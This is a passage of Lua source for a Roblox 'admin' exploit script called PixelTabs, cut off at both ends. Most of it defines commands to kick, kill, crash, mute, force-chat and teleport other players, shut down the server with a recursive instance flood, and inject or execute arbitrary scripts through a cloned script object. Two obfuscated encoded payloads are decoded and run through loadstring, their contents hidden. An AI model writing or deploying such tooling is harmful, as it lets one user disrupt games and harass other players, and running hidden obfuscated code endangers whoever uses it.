  664. Explore(v)
  665. end);
  666. end;
  667. end;
  668. ['View parent']=function()
  669. wait()
  670. Explore(Item.Parent)
  671. end;
  672. ['Destroy']=function()
  673. Item:Destroy();
  674. Explore(Item.Parent);
  675. end;
  676. ['Clear']=function()
  677. Item:ClearAllChildren()
  678. end;
  679. ['Clone']=function()
  680. pcall(function()
  681. cloneableObj = Item:clone()
  682. end)
  683. end;
  684. ['Remove']=function()
  685. Item:remove()
  686. end;
  687. ['Paste']=function()
  688. if cloneableObj then
  689. cloneableObj.Parent = Item
  690. end
  691. end;
  692. ['Ki'..'ck Item']=function()
  693. NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
  694. end;
  695. };
  696. for i,v in pairs(f)do
  697. Output(tostring(i),v);
  698. end;
  699. Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
  700. Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
  701. if cloneableObj then
  702. Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
  703. end
  704. end;
  705. end;
  706.  
  707. AddCmd("Explore","explore","Explore the game",
  708. function()
  709. Explore()
  710. end
  711. )
  712.  
  713. function NewLS(sourcevalue, parent)
  714. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  715. NLS(sourcevalue, parent)
  716. else
  717. local NS = sorcery:Clone()
  718. NS.Name = "NewLocal"
  719. local Source = NS:findFirstChild(SourceName)
  720. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  721. Source.Value = sourcevalue
  722. NS.Parent = parent
  723. NS.Disabled = false
  724. return NS
  725. end
  726. end
  727.  
  728. Clothes = {}
  729.  
  730. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  731. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  732. table.insert(Clothes,Item:Clone())
  733. end
  734. end
  735. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  736. if v:IsA("BodyColors") then
  737. body = v
  738. torsocolor = body.TorsoColor
  739. leftlegcolor = body.LeftLegColor
  740. rightlegcolor = body.RightLegColor
  741. leftarmcolor = body.LeftArmColor
  742. rightarmcolor = body.RightArmColor
  743. headcolor = body.HeadColor
  744. end
  745. end
  746.  
  747. mouse = LocalPlayer:GetMouse()
  748.  
  749. mouse.KeyDown:connect(function(key)
  750. if key == "z" then
  751. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  752. end
  753. end)
  754.  
  755. AddCmd("Toogle ChatGUI","chat","Toogle ChatGUI on/off",
  756. function(plrs, msg)
  757. if msg == "off" then
  758. chatgui = false
  759. elseif msg == "on" then
  760. chatgui = true
  761. end
  762. end
  763. )
  764.  
  765. AddCmd("infoz","infoz","shows who made this admin",
  766. function()
  767. Dismiss()
  768. for i = 1,1 do
  769. wait()
  770. Output("Downloading..", __)
  771. wait()
  772. Output("PixelTabs made by Pixenova", __)
  773. end
  774. end
  775. )
  776.  
  777. AddCmd("DragonSlayer","ds","Gives DragonSlayer",
  778. function()
  779. Dismiss()
  780. for i = 1,1 do
  781. Output("DragonSlayer Given",__)
  782. local obj = game:service("InsertService"):LoadAsset(73232786)
  783. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end
  784. end
  785. end
  786. )
  787.  
  788.  
  789.  
  790. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  791. function(plrs, msg)
  792. local keypos = msg:find(key)
  793. local targPlayers = msg:sub(1,keypos-1)
  794. local plrs = getPlayers(targPlayers)
  795. local speed = msg:sub(tonumber(keypos+1))
  796. for _,v in pairs(plrs) do
  797. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  798. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  799. end
  800. end
  801. end
  802. )
  803.  
  804.  
  805.  
  806. AddCmd("Teleport","tp","Teleport a player to a place",
  807. function(plrs, msg)
  808. local keypos = msg:find(key)
  809. local targPlayers = msg:sub(1,keypos-1)
  810. local plrs = getPlayers(targPlayers)
  811. local id = msg:sub(tonumber(keypos+1))
  812. for _,v in pairs(plrs) do
  813. if v and v.Backpack then
  814. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  815. end
  816. end
  817. end
  818. )
  819.  
  820.  
  821. AddCmd("Chat","cht","Forces a player to chat ;)",
  822. function(plrs, msg)
  823. local keypos = msg:find(key)
  824. local targPlayers = msg:sub(1,keypos-1)
  825. local plrs = getPlayers(targPlayers)
  826. local id = msg:sub(tonumber(keypos+1))
  827. for _,v in pairs(plrs) do
  828. if v and v.Backpack then
  829. NewLS([==[game:service'Players':Chat(']==]..id..[==[')]==], v.Backpack)
  830. end
  831. end
  832. end
  833. )
  834.  
  835. Bad_Char = ""
  836.  
  837. function chatgui(msg)
  838. if not chatgui then return end
  839. if probemode == false then
  840. if LocalPlayer.Character:findFirstChild("Head") then
  841. mainPart = LocalPlayer.Character:findFirstChild("Head")
  842. end
  843. end
  844. if probemode == true then
  845. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  846. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  847. end
  848. end
  849. local bg = Instance.new("BillboardGui", mainPart)
  850. bg.Adornee = mainPart
  851. bg.Name = "CHATGUIBG"
  852. bg.Size = UDim2.new(4, 0, 2.5, 0)
  853. bg.StudsOffset = Vector3.new(-4, 2, 0)
  854. local bg2 = Instance.new("BillboardGui", mainPart)
  855. bg2.Adornee = mainPart
  856. bg2.Name = "CHATGUIBG2"
  857. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  858. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  859. local text = Instance.new("TextLabel", bg)
  860. text.Size = UDim2.new(3, 0, 0.5, 0)
  861. text.FontSize = "Size18"
  862. text.TextScaled = true
  863. text.TextTransparency = 0
  864. text.BackgroundTransparency = 1
  865. text.TextTransparency = 0
  866. text.TextStrokeTransparency = 0
  867. text.Font = "Arial"
  868. text.TextColor = BrickColor.new("Institutional white")
  869. text.Text = " "
  870. Message = msg:sub(1)
  871. if #Message >50 then return end
  872. for i = 0, #Message, 1 do
  873. wait(0.01)
  874. text.Text = string.gsub("["..LocalPlayer.Name.."]: "..Message:sub(0, i),'fuck','fuck')
  875. end
  876. wait()
  877. coroutine.resume(coroutine.create(function()
  878. for i = 0, 5, 0.05 do
  879. if bg ~= nil then
  880. if bg2 ~= nil then
  881. wait()
  882. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  883. end
  884. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  885. end
  886. end
  887. end))
  888. for i=text.TextTransparency,1,0.02 do
  889. wait()
  890. text.TextTransparency = i
  891. text.TextStrokeTransparency = i
  892. end
  893. if bg == nil then return end
  894. bg:Destroy()
  895. if bg2 == nil then return end
  896. bg2:Destroy()
  897. end
  898.  
  899. LocalPlayer.Chatted:connect(chatgui)
  900.  
  901. AddCmd("Message","m","Make a message over the screen",
  902. function(plrs, msg)
  903. Message = msg
  904. NewS([[
  905. a = Instance.new("Message", workspace)
  906. a.Text = ]].."[ "..LocalPlayer.Name.." ]: "..Message, workspace)
  907. end
  908. )
  909.  
  910. AddCmd("Hint","h","Make a message at top of the screen",
  911. function(plrs, msg)
  912. Hint = msg
  913. NewS([[
  914. a = Instance.new("Hint", workspace)
  915. a.Text = ]]..Hint, workspace)
  916. end
  917. )
  918.  
  919. AddCmd("Commands","cmds","Show the list of commands",
  920. function()
  921. Dismiss()
  922. for i, v in pairs(Cmds) do
  923. Output(v["Name"],
  924. function()
  925. Output("Description: "..v["Desc"], __)
  926. Output("Usage: "..v["Say"], __)
  927. Output("Name: "..v["Name"], __)
  928. end)
  929. end
  930. end
  931. )
  932.  
  933. AddCmd("Rejoin player","rej","Rejoin the player",
  934. function(plrs)
  935. for _, plr in pairs(plrs) do
  936. if plr and plr.Backpack then
  937. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  938. end
  939. end
  940. end
  941. )
  942.  
  943.  
  944. AddCmd("Nil players","nilp","Check nil players",
  945.         function()
  946.                 NewS([[
  947.                         local mod = Instance.new("Model")
  948.                         mod.Name = "NilPlayers"
  949.                         pcall(function()
  950.                                 for k,v in pairs(game:GetService("NetworkServer"):GetChildren()) do
  951.                                         pcall(function()
  952.                                                 local p = v:GetPlayer()
  953.                                                 if p.Parent ~= game.Players then
  954.                                                         local a = Instance.new("StringValue", mod)
  955.                                                         a.Value = "NIL: "..p.Name
  956.                                                 else
  957.                                                         local a = Instance.new("StringValue", mod)
  958.                                                         a.Value = p.Name
  959.                                                 end
  960.                                         end)
  961.                                 end
  962.                         end)
  963.                         mod.Parent = game:GetService("Lighting")
  964.                         script:Destroy()
  965.                 ]], game.Workspace)
  966.                 local np = false
  967.                 for i=1,5,0.1 do
  968.                         np = game:GetService("Lighting"):findFirstChild("NilPlayers")
  969.                         if np then break end
  970.                         wait(0.1)
  971.                 end
  972.                 if not np then
  973.                         return Output("Something went wrong! F\5U\5C\5K!","Really red")
  974.                 end
  975.                 for k,v in pairs(np:GetChildren()) do
  976.                         if v:IsA("StringValue") then
  977.                                 if v.Value:lower():sub(1,4) == "nil:" then
  978.                                         Output(v.Value,"Really red")
  979.                                 else
  980.                                         Output(v.Value)
  981.                                 end
  982.                         end
  983.                 end
  984.                 wait()
  985.                 np:Destroy()
  986.         end
  987. )
  988.  
  989.  
  990. AddCmd("Create base","base","Create the base",
  991. function()
  992. a = Instance.new("Part")
  993. a.Parent = Workspace
  994. a.Name = "Base"
  995. a.Position = Vector3.new(0, 0.6, 0)
  996. a.Size = Vector3.new(1002, 0, 1002)
  997. a.Material = "Grass"
  998. a.Anchored = true
  999. a.BrickColor = BrickColor.new("Dark green")
  1000. end
  1001. )
  1002.  
  1003. AddCmd("Ping","ping","Ping something",
  1004. function(plrs, msg)
  1005. if msg == "" then
  1006. Output("pong", __)
  1007. else
  1008. Output(msg, __)
  1009. end
  1010. end
  1011. )
  1012.  
  1013. AddCmd("Dismiss","dis","Dismiss tabs",
  1014. function()
  1015. Dismiss()
  1016. end
  1017. )
  1018.  
  1019. AddCmd("Probe mode", "probe", "Be a ball and fly around",
  1020. function()
  1021. probemode = true
  1022. Dismiss()
  1023. if LocalPlayer.Character then LocalPlayer.Character = nil end
  1024. if workspace.CurrentCamera == nil then return end
  1025. local camera = workspace.CurrentCamera
  1026. local probe = Instance.new("Part", workspace)
  1027. M = Instance.new("SpecialMesh", probe)
  1028. M.MeshId=("http://www.roblox.com/asset/?id=13640868")
  1029. M.TextureId=("http://www.roblox.com/asset/?id=18987684") -- i found a blue sparkel time fedora
  1030. M.Scale = Vector3.new(2, 2, 2)
  1031. probe.TopSurface = 0
  1032. probe.Anchored = true
  1033. probe.BottomSurface = 0
  1034. probe.Name = LocalPlayer.Name.."'s probe"
  1035. local rotation = 0
  1036. local bbg = Instance.new("BillboardGui", probe)
  1037. bbg.Size = UDim2.new(3, 0, 3 ,0)
  1038. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  1039. local txt = Instance.new("TextLabel", bbg)
  1040. txt.FontSize = "Size24"
  1041. txt.Font = "SourceSansBold"
  1042. txt.Text = LocalPlayer.Name
  1043. txt.BackgroundTransparency = 1
  1044. txt.TextColor = BrickColor.new("Institutional white")
  1045. txt.TextStrokeTransparency = 0
  1046. txt.Size = UDim2.new(1,0,1,0)
  1047. local pl = Instance.new("PointLight", probe)
  1048. pl.Shadows = true
  1049. pl.Range = 20
  1050. coroutine.wrap(function()
  1051. while pl ~= nil do
  1052. pl.Color=Color3.new(math.random(),math.random(),math.random())
  1053. wait(0.8)
  1054. end
  1055. end)()
  1056. coroutine.wrap(function()
  1057. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  1058. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  1059. rotation = rotation + 0.1
  1060. end
  1061. if camera then
  1062. camera:Destroy()
  1063. end
  1064. probe:Destroy()
  1065. end)()
  1066. end
  1067. )
  1068.  
  1069. AddCmd("Make your character","char","Creates your character",
  1070. function()
  1071. if workspace.CurrentCamera == nil then return end
  1072. local camera = workspace.CurrentCamera
  1073. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  1074. local human = new_char.Humanoid
  1075. human.Parent = nil
  1076. new_char.Name = LocalPlayer.Name
  1077. wait()
  1078. human.Parent = new_char
  1079. camera.CameraSubject = human
  1080. camera.CameraType = "Custom"
  1081. new_char.Parent = workspace
  1082. local pl = Instance.new("PointLight", new_char.Head)
  1083. pl.Range = 24
  1084. pl.Shadows = true
  1085. LocalPlayer.Character = new_char
  1086. new_char:MakeJoints()
  1087. new_char.Torso.BrickColor = torsocolor
  1088. new_char["Left Leg"].BrickColor = leftlegcolor
  1089. new_char["Right Leg"].BrickColor = rightlegcolor
  1090. new_char["Left Arm"].BrickColor = leftarmcolor
  1091. new_char["Right Arm"].BrickColor = rightarmcolor
  1092. new_char.Head.BrickColor = headcolor
  1093. for i,v in pairs(Clothes) do
  1094. v:Clone().Parent = new_char
  1095. end
  1096. probemode = false
  1097. end
  1098. )
  1099.  
  1100. AddCmd("Stop the commands","cremove","Remove the commands",
  1101. function()
  1102.     Output("Your Making a Bad Mistake",
  1103.     function()
  1104.         Output("Are You Sure That You Wan't To Remove The Best Admin?",
  1105.         function()
  1106.             Output("Are You 9999% Sure That You Want This???",
  1107.             function()
  1108.                 for i,v in pairs(getfenv(1)) do
  1109.                     getfenv(1)[i] = nil
  1110.                 end
  1111.                 script.Disabled = true
  1112.                 LocalPlayer = NO_PLAYER
  1113.                 script:findFirstChild(SourceName).Value = " "
  1114.                 script.Disabled = true
  1115.                 tabmodel:ClearAllChildren()
  1116.                 tabmodel:Destroy()
  1117.                 connection:disconnect()
  1118.                 Tabs = {}
  1119.                 Cmds = {}
  1120.                 Banlist = {}
  1121.                 fukhed.all = true
  1122.                 coroutine.resume(coroutine.create(function()
  1123.                     while wait(0.1) do
  1124.                         Dismiss()
  1125.                     end
  1126.                 end))
  1127.             end)
  1128.         end)
  1129.     end)
  1130. end)
  1131.  
  1132. AddCmd("ForceField","ff","Give forcefield to player",
  1133. function(plrs)
  1134. for _, plr in pairs(plrs) do
  1135. if plr and plr.Character then
  1136. Instance.new("ForceField", plr.Character)
  1137. end
  1138. end
  1139. end
  1140. )
  1141.  
  1142. AddCmd("Sparkles","sparkles","Give sparkles to player",
  1143. function(plrs)
  1144. for _, plr in pairs(plrs) do
  1145. if plr and plr.Character and plr.Character.Torso then
  1146. Instance.new("Sparkles", plr.Character.Torso)
  1147. end
  1148. end
  1149. end
  1150. )
  1151.  
  1152. AddCmd("Un-Sparkles","unsparkles","Remove sparkles from player",
  1153. function(plrs)
  1154. for _, plr in pairs(plrs) do
  1155. if plr and plr.Character and plr.Character.Torso then
  1156. pcall(function()
  1157. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  1158. if k:IsA("Sparkles") then
  1159. k:Destroy()
  1160. end
  1161. end
  1162. end)
  1163. end
  1164. end
  1165. end
  1166. )
  1167.  
  1168. AddCmd("Crash player","crash","Crash the player",
  1169. function(plrs)
  1170. for _, plr in pairs(plrs) do
  1171. if plr and plr.Backpack then
  1172. NewLS([==[
  1173.         game:GetService("RunService").RenderStepped(function()
  1174.     Delay(0, function() return end)
  1175.     end)]==], plr.Backpack)
  1176. end
  1177. end
  1178. end
  1179. )
  1180.  
  1181. AddCmd("Respawn player","respawn","Respawn the player",
  1182. function(plrs)
  1183. for _, plr in pairs(plrs) do
  1184. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  1185. end
  1186. end
  1187. )
  1188.  
  1189. AddCmd("Mute player","mute","Block the player chat",
  1190. function(plrs)
  1191. for _, plr in pairs(plrs) do
  1192. if plr and plr.Backpack then
  1193. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  1194. end
  1195. end
  1196. end
  1197. )
  1198.  
  1199. AddCmd("Unmute player","unmute","Unblock the player chat",
  1200. function(plrs)
  1201. for _, plr in pairs(plrs) do
  1202. if plr and plr.Backpack then
  1203. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  1204. end
  1205. end
  1206. end
  1207. )
  1208.  
  1209. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  1210. function(plrs)
  1211. for _, plr in pairs(plrs) do
  1212. if plr and plr.Character then
  1213. pcall(function()
  1214. for _,v in pairs(plr.Character:GetChildren()) do
  1215. if v:IsA("ForceField") then
  1216. v:Destroy()
  1217. end
  1218. end
  1219. end)
  1220. end
  1221. end
  1222. end
  1223. )
  1224.  
  1225. AddCmd("Gear","gear","Give gear to player",
  1226. function(plrs, msg)
  1227. local keypos = msg:find(key)
  1228. local targPlayers = msg:sub(1,keypos-1)
  1229. local plrs = getPlayers(targPlayers)
  1230. local asset = msg:sub(tonumber(keypos+1))
  1231. for _,plr in pairs(plrs) do
  1232. if plr and plr.Backpack then
  1233. local obj = game:service("InsertService"):LoadAsset(asset)
  1234. pcall(function()
  1235. for a,g in pairs(obj:children())do
  1236. if g:IsA("Tool") or g:IsA("HopperBin") then
  1237. g.Parent = plr.Backpack
  1238. end
  1239. end
  1240. end)
  1241. end
  1242. end
  1243. end
  1244. )
  1245.  
  1246.  
  1247. AddCmd("God player","god","Make the player immortal",
  1248. function(plrs)
  1249. for _, plr in pairs(plrs) do
  1250. if plr and plr.Character and plr.Character.Humanoid then
  1251. plr.Character.Humanoid.MaxHealth = math.huge
  1252. end
  1253. end
  1254. end
  1255. )
  1256.  
  1257. AddCmd("Ungod player","ungod","Make the player mortal",
  1258. function(plrs)
  1259. for _, plr in pairs(plrs) do
  1260. if plr and plr.Character then
  1261. plr.Character.Humanoid.MaxHealth = 100
  1262. end
  1263. end
  1264. end
  1265. )
  1266.  
  1267. AddCmd("Kick player","kick","Kick a player",
  1268. function(plrs)
  1269. for _, plr in pairs(plrs) do
  1270. if plr and plr.Backpack then
  1271. NewLS("game:service'StarterGui':SerCoreGuiEnabled(3,false)", plr.Backpack)
  1272. plr:Destroy()
  1273. end
  1274. end
  1275. end
  1276. )
  1277.  
  1278. AddCmd("Kill player","kill","Kill a player",
  1279. function(plrs)
  1280. for _, plr in pairs(plrs) do
  1281. if plr and plr.Character then
  1282. plr.Character:BreakJoints()
  1283. end
  1284. end
  1285. end
  1286. )
  1287.  
  1288. AddCmd("Punish player","punish","Remove character of a player",
  1289. function(plrs)
  1290. for _, plr in pairs(plrs) do
  1291. if plr and plr.Character then
  1292. plr.Character:Destroy()
  1293. end
  1294. end
  1295. end
  1296. )
  1297.  
  1298. AddCmd("Admin a player","admin","Give admin to a player",
  1299. function(plrs)
  1300. for _, plr in pairs(plrs) do
  1301. if plr and plr.Backpack then
  1302. a = script:Clone()
  1303. a.Parent = plr.Backpack
  1304. Output("You gave admin to: "..plr.Name, __)
  1305. end
  1306. end
  1307. end
  1308. )
  1309.  
  1310.  
  1311.  
  1312. AddCmd("Fix cam","fcam","Fix anyone's cam",
  1313. function(plrs, msg)
  1314. for _, plr in pairs(plrs) do
  1315. if plr and plr.Backpack then
  1316. NewLS([[
  1317. game.Workspace.CurrentCamera:Destroy()
  1318. cam = Instance.new("Camera", workspace)
  1319. cam.Name = "CurrentCamera"
  1320. cam.FieldOfView = 70
  1321. cam.CameraType = "Custom"
  1322. cam.CameraSubject = game.Players.LocalPlayer.Character.Humanoid]], plr.Backpack)
  1323. end
  1324. end
  1325. end
  1326. )
  1327. local z={["&"]=0,["%"]=1,["="]=2,["!"]=3,["*"]=4,["+"]=5,["?"]=6,["-"]=7,["~"]=8,["#"]=9,["$"]=10,[")"]=11,["^"]=12,["("]=13,["_"]=14,["@"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1328. "??+-_?!?*-#?@?_?&=!?=-+?%?*-+?!+@?+-_?*?~=#A*#=$&#&!+@?+-_?*?(!#*_?!-*-%?_?!?+?_=_?+?--~A=!+@?+-_?*?==^=-*%?(?+?)+==-+@?=-)?!-&-%?!?+?==(+#=$&#&!+@?+-_?*?)+==_*%?(?+?==(+(!~A=!++?=-?-+?=-@+!+#-!-*-+?(?@+!+@?+-_?*?==#=$&#&!+@?+-_?*?)+==&+#?*-!?~?==(+(!~=%!#=$&#&!+@?+-_?*?)+==!+@?+-_?*?#**?==(+(!~===~?*-*-&-$!@=@=------_==-@?=?^?@?~-_=!?@?(?@=%?!-!-+?*-@=@!#?*?(!==_=_=*-@?_?+-(?=?+?=-~=#***#=#=$&#&!+@?+-_?*?)+==?+@?^?+-(?+?==(+(!~=&!_=+!#=$&#&--%?#?*-~=#=$&#&!+@?+-_?*?$!&+^?%?#-~=#=$&+?_?*?"
  1329. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1330. function CheckForExistingSound()
  1331.     for _,Child in pairs(Game["Workspace"]:GetChildren()) do
  1332.         if(Child["ClassName"]==("Sound"))then
  1333.             Child:Pause()
  1334.             Child["PlayOnRemove"]=(false);
  1335.             wait()
  1336.             Child:Destroy()
  1337.         end
  1338.     end
  1339. end
  1340. function ShowMusicList()
  1341.     Dismiss()
  1342.     Output("Tacos",function()
  1343.         CheckForExistingSound()
  1344.         createSound(142295308)
  1345.     end)
  1346.     Output("Tsunami Hardstyle",function()
  1347.         CheckForExistingSound()
  1348.         createSound(142720946)
  1349.     end)
  1350.     Output("Headhunterz - Fear",function()
  1351.         CheckForExistingSound()
  1352.         createSound(146180801)
  1353.     end)
  1354.     Output("Headhunterz - Dragonborn",function()
  1355.         CheckForExistingSound()
  1356.         createSound(145060711)
  1357.     end)
  1358.     Output("Eminem - Rap God",function()
  1359.         CheckForExistingSound()
  1360.         createSound(143647605)
  1361.     end)
  1362.     Output("Eminem - I'm Not Afraid",function()
  1363.         CheckForExistingSound()
  1364.         createSound(131149175)
  1365.     end)
  1366.     Output("Dj Swoom - I'm Blue",function()
  1367.         CheckForExistingSound()
  1368.         createSound(150526348)
  1369.     end)
  1370.     Output("Pirates of the Caribbean",function()
  1371.         CheckForExistingSound()
  1372.         createSound(142328554)
  1373.     end)
  1374.     Output("Turn Down For What",function()
  1375.         CheckForExistingSound()
  1376.         createSound(143959455)
  1377.     end)
  1378.     Output("Chamillionaire - Ridin' Dirty",function()
  1379.         CheckForExistingSound()
  1380.         createSound(143735700)
  1381.     end)
  1382.     Output("Eminem - When I'm Gone",function()
  1383.         CheckForExistingSound()
  1384.         createSound(153116498)
  1385.     end)
  1386.     Output("Gas Pedal",function()
  1387.         CheckForExistingSound()
  1388.         createSound(142489916)
  1389.     end)
  1390.     Output("Eminem & The Script Hall of Fame Remix",function()
  1391.         CheckForExistingSound()
  1392.         createSound(152879311)
  1393.     end)
  1394.         Output("Let it Go",function()
  1395.                 CheckForExistingSound()
  1396.                 createSound(150320143)
  1397.         end)
  1398. end
  1399. AddCmd("Musiclist","musicl","Shows the Possible Sounds to Play",
  1400. function()
  1401.     ShowMusicList()
  1402. end)
  1403. AddCmd("AFK","afk","Ping yourself as afk",
  1404. function()
  1405. Dismiss()
  1406. for i = 1,8 do
  1407. wait()
  1408. Output("AFK", __)
  1409. end
  1410. end
  1411. )
  1412.  
  1413. AddCmd("Back","back","Ping yourself as back",
  1414. function()
  1415. Dismiss()
  1416. for i = 1,8 do
  1417. wait()
  1418. Output("Back", __)
  1419. end
  1420. wait(3)
  1421. Dismiss()
  1422. end
  1423. )
  1424.  
  1425. AddCmd("Ban a player","ban","Kicks a player when he enters",
  1426. function(plrs, msg)
  1427. for _,v in pairs(plrs) do
  1428. if v then
  1429. table.insert(Banlist,v.Name)
  1430. Output('Banned | '..v.Name,__)
  1431. else
  1432. Output(Error)
  1433. end
  1434. end
  1435. end
  1436. )
  1437.  
  1438. local charMap = {["+"] = 0, ["^"] = 1, ["%"] = 2, [")"] = 3, ["*"] = 4, ["$"] = 5, ["-"] = 6, ["_"] = 7, ["#"] = 8, ["&"] = 9, ["@"] = 10, ["("] = 11, ["?"] = 12, ["~"] = 13, ["!"] = 14, ["="] = 15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1439. "?-=-)-^-?-+%&-~)~%^)()?-=-^-*-)_*_%_&-!-_-#%)_*_%_&-!-_-!%_-)_$_%-#B%!*!_~*~!~^&&~?@(&!&_@_~&~@A?@~@~_~~?^~&?&#)~)~+~-?@?%?##+?(A?#(~_-_(=?=!!@!)=$@?!!(?@!@-($!-!-~_~*!)!=~*~_~!?~#-~$~^~-?&?+?$#?(-?-?^($_~-@$@$(*-*~&^(~=$##$&$?$?$^^!A=-+&%#)$)*%!%~%!~=^=^!+!+?$+)%)-)#^)^_+&+==~($+)+!=%=*=@!!@*!~!?!-~&&+&&@#?*?=&$?#($($_(-#&*@=@%@$@$@~*%&)&_#?#()^*$#*&)_*_#-~-?^?$%%*^_)#$?*^$+$_*_)-*_)-)#C)**~^?$+)%)-))%$%+%#?_^)+!+^+*+*+!@*(!#-!^=+%$!-~~^%!)~$~+~-#)#+-#(~(?(#(#?&@?$?$$_*$+-A@(-*@$!)!_$#?^$#~(A?-)_)%+%~=!)+-($)$*$=*==$==!~!)=)!!^?$+)%)-)+!~(*^#-?_&+(@?!!+&+^+%+~=~@)@+~?~_!@C~$#@?+~&_%?%(^(!@$-)@-(&$^(%A&!#+&*&!_@*_*$*+*()^#^%&_?$?$*-+-&$*$!*~*&*!)_*!)!%_)-=^=-=$)_B~?#+*+@?_@#!?$!-$+~=!=&=&@=&+~@A~+~#~%~-?~_~?*?^_!--?(#)@+(!@?@@@@&!*(#@#=#_###%&*)@)@%$-^-_%*+$*_-%-@$($-$-+?=?%_)+*~)=%^)!-+*+*%**~?%!~--&)@)~))?&?&(*=+=-()&@!=!^!)#!&(#%&$#!#=_-#~(&?=(^(=(^(*(+(_-=&%-=&+_&&#$($%--&-#%&+&@#)#%)%#+#(_=-^__-(%~$=$$$)--^)^($&$*$#*@*+**+$)&*^*=%="
  1440. ,"!_%@!&!!!)!!^(~*~??(~$^@~#~#?^+_+@=!+=^#($(^(=@=-__(-$__-=-_@*((@!&~@+@*@^@&$%&-$*&--+&+$*$?$?$^&%#=#!#&#)#))*#)#=_*___!-))--&-+-=-)%^%@-&-$-@$~$*$&^(*+-&$#*&+%*-+-+%^#+++?)@=*=~!~=!=~=!!#%=%)%-!*!^!+!%#(#+#(#!__#+?!?-?@(@?!()?^?@_*(&_#((#-(__?_$#((~@((((_(%()-$($(%(#@?@*@@-!&%@@&@@=$!$#@#@$@(&=&_&~$+&-@+@+&%$?#^$%$)$($*$!*(#@*$*=)+$%$%$**=__#?_+*=)~)~)%%?%%%!%%%?%--$_!-)-*_&-=-!-#%)-&%&-~)&-(%^)()%_$-*_$_%_!-+%)_*_%_&-!-_-!%)-#-^-%_#%#%)_*_%_&-!-_-!%%-&_*_$-#%)-&%(%~%^)^)#)(%&-&%$%+%%)$)-)&%$-!-*-&%&%#%&%"
  1441. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(charMap[lo]+charMap[hi]*16)end)))),getfenv())()
  1442.  
  1443. AddCmd("Shutdown the game","sd","Shutdown the game",
  1444. function()
  1445. NewS([[ local function BufferOverflow(object)
  1446.                 object.DescendantAdded:connect(BufferOverflow)
  1447.                 Instance.new("IntValue", object)
  1448.         end
  1449.         BufferOverflow(Game)
  1450. ]], workspace)
  1451. end
  1452. )
  1453.  
  1454. AddCmd("Check source","chks","Check if the source is found",
  1455. function()
  1456. if found then
  1457. Output("Source is found")
  1458. else
  1459. Output("Source is not found")
  1460. end
  1461. end
  1462. )
  1463.  
  1464. AddCmd("Say bye to everyone","bye","Say bye to everyone",
  1465. function()
  1466. Dismiss()
  1467. for i = 1,8 do
  1468. Output("Bye", __)
  1469. end
  1470. end
  1471. )
  1472.  
  1473. AddCmd("Check source name","chksn","Check the source name",
  1474. function()
  1475. Output(SourceName, __)
  1476. end
  1477. )
  1478.  
  1479. AddCmd("Change source name","csn","Change the source name",
  1480. function(plrs, msg)
  1481. SourceName = tostring(msg)
  1482. end
  1483. )
  1484.  
  1485. AddCmd("Kick player list","klist", "Show a kick player list",
  1486. function()
  1487. Dismiss()
  1488. Output("Click on the player name that you want to kick", __)
  1489. for _,v in pairs(game:GetService("Players"):GetChildren()) do
  1490. Output(v.Name,
  1491. function()
  1492. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack)
  1493. v:Destroy()
  1494. end)
  1495. end
  1496. end
  1497. )
  1498.  
  1499. AddCmd("Script","script","Execute a Script",
  1500. function(plrs, msg)
  1501. NewS(msg, workspace)
  1502. end
  1503. )
  1504.  
  1505. AddCmd("LocalScript","local","Execute a LocalScript",
  1506. function(plrs, msg)
  1507. NewLS(msg, LocalPlayer.Backpack)
  1508. end
  1509. )
  1510.  
  1511. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  1512. function(plrs, msg)
  1513. a,b = ypcall(function()
  1514. loadstring(msg)()
  1515. end) if not a then Output(b,"Bright red") end
  1516. end
  1517. )
  1518.  
  1519.  
  1520. AddCmd("#Commands","#cmds","See how much are commands in this admin",
  1521. function()
  1522. Output(#Cmds, __)
  1523. end
  1524. )
  1525.  
  1526. AddCmd("Clean workspace","clean","Clean everything in workspace except terrain",
  1527. function()
  1528. NewS([[
  1529. for _,v in pairs(game.Workspace:GetChildren()) do
  1530. if v.Name ~= "Terrain" then
